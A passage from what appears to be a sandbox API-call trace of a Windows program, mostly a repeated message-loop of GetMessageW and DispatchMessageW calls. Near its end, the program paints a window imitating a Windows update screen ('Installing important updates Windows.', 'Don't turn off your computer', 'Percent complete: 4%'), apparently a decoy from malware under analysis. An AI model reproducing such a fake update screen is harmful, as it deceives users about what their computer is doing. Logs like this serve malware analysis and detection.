(lpMsg=0x18e548) returned 0x0 [0084.888] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.888] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.888] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.888] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.889] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.076] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.076] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.076] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.076] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.076] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.076] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.076] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.077] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.122] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.122] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.122] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.122] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.122] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.122] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.122] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.123] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.168] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.168] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.168] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.168] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.168] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.169] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.169] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.169] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.216] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.216] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.216] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.216] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.216] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.216] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.216] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.218] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.262] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.262] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.262] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.262] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.262] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.262] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.262] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.263] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.309] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.309] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.309] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.309] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.309] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.309] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.309] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.310] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.356] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.356] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.356] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.356] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.356] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.356] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.356] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.357] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0085.402] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0085.402] TranslateMessage (lpMsg=0x18e548) returned 0 [0085.402] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0085.403] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.401] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.401] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.401] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.401] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.448] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.448] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.448] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.448] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.448] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.448] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.448] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.450] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.494] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.494] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.495] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.495] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.495] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.495] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.495] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.496] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.542] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.542] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.542] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.542] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.542] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.542] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.542] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.544] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.588] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.588] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.588] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.588] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.588] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.588] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.588] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.589] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.635] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.635] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.635] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.635] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.635] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.635] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.635] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.636] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.706] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.706] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.706] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.706] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.706] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.706] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.707] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.708] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.744] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.744] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.744] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.744] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.744] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.744] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.744] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.745] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.791] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.791] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.791] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.791] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.792] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.792] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.792] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.793] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.838] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.838] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.838] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.838] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.838] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.838] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.838] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.839] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.885] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.885] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.885] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.885] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0086.886] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0086.886] TranslateMessage (lpMsg=0x18e548) returned 0 [0086.886] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0086.887] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.944] TranslateAcceleratorW (hWnd=0xb0270, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.945] TranslateMessage (lpMsg=0x18e548) returned 1 [0090.945] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.945] NtdllDefWindowProc_W () returned 0x0 [0090.945] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.945] TranslateAcceleratorW (hWnd=0xb0270, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.945] TranslateMessage (lpMsg=0x18e548) returned 1 [0090.945] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.945] NtdllDefWindowProc_W () returned 0x0 [0090.945] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.945] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.945] TranslateMessage (lpMsg=0x18e548) returned 0 [0090.945] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.945] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.946] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.946] TranslateMessage (lpMsg=0x18e548) returned 0 [0090.946] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.951] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.953] TranslateAcceleratorW (hWnd=0xb0270, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.953] TranslateMessage (lpMsg=0x18e548) returned 1 [0090.953] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.953] NtdllDefWindowProc_W () returned 0x0 [0090.953] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.959] NtdllDefWindowProc_W () returned 0x1 [0090.966] NtdllDefWindowProc_W () returned 0x0 [0090.966] NtdllDefWindowProc_W () returned 0x0 [0090.966] NtdllDefWindowProc_W () returned 0x0 [0090.966] NtdllDefWindowProc_W () returned 0x0 [0090.966] NtdllDefWindowProc_W () returned 0x0 [0090.966] TranslateAcceleratorW (hWnd=0xb0270, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.966] TranslateMessage (lpMsg=0x18e548) returned 0 [0090.966] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.966] BeginPaint (in: hWnd=0xb0270, lpPaint=0x18e2e0 | out: lpPaint=0x18e2e0) returned 0x210101c6 [0090.966] NtdllDefWindowProc_W () returned 0x0 [0090.967] NtdllDefWindowProc_W () returned 0x1 [0090.968] EndPaint (hWnd=0xb0270, lpPaint=0x18e2e0) returned 1 [0090.968] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.968] TranslateAcceleratorW (hWnd=0x50018, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.968] TranslateMessage (lpMsg=0x18e548) returned 0 [0090.968] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.968] BeginPaint (in: hWnd=0x50018, lpPaint=0x18d9c8 | out: lpPaint=0x18d9c8) returned 0x1b010842 [0090.969] CreateSolidBrush (color=0x5b3ef) returned 0x181009d0 [0090.969] FillRect (hDC=0x1b010842, lprc=0x18d9b8, hbr=0x181009d0) returned 1 [0090.969] DeleteObject (ho=0x181009d0) returned 1 [0090.969] DrawIcon (hDC=0x1b010842, X=7, Y=7, hIcon=0xe0243) returned 1 [0090.969] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x190a09ef [0090.969] SelectObject (hdc=0x1b010842, h=0x190a09ef) returned 0x18a002e [0090.969] SetBkMode (hdc=0x1b010842, mode=1) returned 2 [0090.969] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0090.969] TextOutW (hdc=0x1b010842, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0090.969] SelectObject (hdc=0x1b010842, h=0x18a002e) returned 0x190a09ef [0090.969] CreateSolidBrush (color=0xffffff) returned 0x191009d0 [0090.969] FillRect (hDC=0x1b010842, lprc=0x18d9a8, hbr=0x191009d0) returned 1 [0090.969] DeleteObject (ho=0x191009d0) returned 1 [0090.969] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0xb0a09f1 [0090.970] SelectObject (hdc=0x1b010842, h=0xb0a09f1) returned 0x18a002e [0090.970] SetBkMode (hdc=0x1b010842, mode=1) returned 1 [0090.970] lstrlenW (lpString="Getting your update ready.") returned 26 [0090.970] TextOutW (hdc=0x1b010842, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0090.970] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0090.970] TextOutW (hdc=0x1b010842, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0090.970] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0090.970] TextOutW (hdc=0x1b010842, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0090.970] SelectObject (hdc=0x1b010842, h=0x18a002e) returned 0xb0a09f1 [0090.970] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x50a09f4 [0090.971] SelectObject (hdc=0x1b010842, h=0x50a09f4) returned 0x18a002e [0090.971] SetBkMode (hdc=0x1b010842, mode=1) returned 1 [0090.971] SetTextAlign (hdc=0x1b010842, align=0x6) returned 0x0 [0090.971] wsprintfW (in: param_1=0x18da08, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0090.971] lstrlenW (lpString="Percent complete: 4%") returned 20 [0090.971] TextOutW (hdc=0x1b010842, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0090.971] SelectObject (hdc=0x1b010842, h=0x18a002e) returned 0x50a09f4 [0090.971] EndPaint (hWnd=0x50018, lpPaint=0x18d9c8) returned 1 [0090.972] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.972] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.972] TranslateMessage (lpMsg=0x18e548) returned 0 [0090.972] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.978] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.978] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.978] TranslateMessage (lpMsg=0x18e548) returned 0 [0090.978] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.979] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0090.979] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0090.979] TranslateMessage (lpMsg=0x18e548) returned 0 [0090.979] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0090.979] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0091.065] TranslateAcceleratorW (hWnd=0x301bc, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0091.065] TranslateMessage (lpMsg=0x18e548) returned 0 [0091.065] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0091.065] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0091.277] NtdllDefWindowProc_W () returned 0x0 [0091.277] NtdllDefWindowProc_W () returned 0x0 [0091.279] NtdllDefWindowProc_W () returned 0x1 [0091.279] TranslateAcceleratorW (hWnd=0xb0270, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0091.279] TranslateMessage (lpMsg=0x18e548) returned 0 [0091.279] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0091.279] BeginPaint (in: hWnd=0xb0270, lpPaint=0x18e2e0 | out: lpPaint=0x18e2e0) returned 0x210101c6 [0091.279] EndPaint (hWnd=0xb0270, lpPaint=0x18e2e0) returned 1 [0091.279] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0091.279] TranslateAcceleratorW (hWnd=0x50018, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0091.279] TranslateMessage (lpMsg=0x18e548) returned 0 [0091.279] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0091.279] BeginPaint (in: hWnd=0x50018, lpPaint=0x18d9c8 | out: lpPaint=0x18d9c8) returned 0xa01087f [0091.280] CreateSolidBrush (color=0x5b3ef) returned 0x1a1009d0 [0091.280] FillRect (hDC=0xa01087f, lprc=0x18d9b8, hbr=0x1a1009d0) returned 1 [0091.280] DeleteObject (ho=0x1a1009d0) returned 1 [0091.280] DrawIcon (hDC=0xa01087f, X=7, Y=7, hIcon=0xe0243) returned 1 [0091.280] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x1a0a09dc [0091.280] SelectObject (hdc=0xa01087f, h=0x1a0a09dc) returned 0x18a002e [0091.280] SetBkMode (hdc=0xa01087f, mode=1) returned 2 [0091.280] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0091.280] TextOutW (hdc=0xa01087f, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0091.280] SelectObject (hdc=0xa01087f, h=0x18a002e) returned 0x1a0a09dc [0091.280] CreateSolidBrush (color=0xffffff) returned 0x1b1009d0 [0091.280] FillRect (hDC=0xa01087f, lprc=0x18d9a8, hbr=0x1b1009d0) returned 1 [0091.280] DeleteObject (ho=0x1b1009d0) returned 1 [0091.281] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0xd0a0a20 [0091.281] SelectObject (hdc=0xa01087f, h=0xd0a0a20) returned 0x18a002e [0091.281] SetBkMode (hdc=0xa01087f, mode=1) returned 1 [0091.281] lstrlenW (lpString="Getting your update ready.") returned 26 [0091.281] TextOutW (hdc=0xa01087f, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0091.281] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0091.281] TextOutW (hdc=0xa01087f, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0091.281] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0091.281] TextOutW (hdc=0xa01087f, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0091.281] SelectObject (hdc=0xa01087f, h=0x18a002e) returned 0xd0a0a20 [0091.281] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0xb0a0a15 [0091.282] SelectObject (hdc=0xa01087f, h=0xb0a0a15) returned 0x18a002e [0091.282] SetBkMode (hdc=0xa01087f, mode=1) returned 1 [0091.282] SetTextAlign (hdc=0xa01087f, align=0x6) returned 0x0 [0091.282] wsprintfW (in: param_1=0x18da08, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0091.283] lstrlenW (lpString="Percent complete: 4%") returned 20 [0091.283] TextOutW (hdc=0xa01087f, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0091.283] SelectObject (hdc=0xa01087f, h=0x18a002e) returned 0xb0a0a15 [0091.283] EndPaint (hWnd=0x50018, lpPaint=0x18d9c8) returned 1 [0091.283] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0091.283] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0091.283] TranslateMessage (lpMsg=0x18e548) returned 0 [0091.283] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0091.285] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0091.285] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0091.285] TranslateMessage (lpMsg=0x18e548) returned 0 [0091.285] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0091.286] GetMessageW (in: 